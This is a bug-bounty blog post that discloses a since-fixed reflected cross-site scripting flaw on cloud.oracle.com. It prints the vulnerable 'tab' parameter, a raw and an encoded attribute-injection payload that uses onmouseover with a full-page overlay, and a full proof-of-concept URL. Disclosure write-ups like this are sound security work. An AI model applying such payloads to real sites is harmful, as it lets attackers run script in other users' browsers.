Blog Posts:

Cross Site Scripting Vulnerability in Oracle

In November, I reported a Cross Site Scripting bug which was affecting their domain "cloud.oracle.com".

They fixed it within a month & I got listed in their Critical Patches Advisory Later in January.

DETAILS:

So as you already know that Cross Site Scripting is an attack in which we can inject custom JavaScript codes & the browser executes them as the part of the page. So for the proof of concept I used a simple alert(document.domain) payload, but the exploitation is not limited.

The domain which was vulnerable was "cloud.oracle.com".

Affected Parameter: tab=INJECT-HERE

Payload: v9msv'onmouseover='alert(document.domain)'style='position:absolute;width:100%;height:100%;top:0;left:0;'poeg2

Encoded: v9msv%27onmouseover=%27alert(document.domain)%27style=%27position:absolute;width:100%;height:100%;top:0;left:0;%27poeg2


So by adding all up, the POC Link was:

https://cloud.oracle.com/developer/solutions?tab=v9msv%27onmouseover=%27alert(document.domain)%27style=%27position:absolute;width:100%;height:100%;top:0;left:0;%27poeg2




Upon Opening the Link and moving your mouse cursor a little bit, the XSS would been triggered.
Maybe I'll do some other post about the above payload in the future, but I tried some other payloads on the Parameter which didn't work.

Video Poc:


Thanks for reading, lots of more things coming up !

2 comments: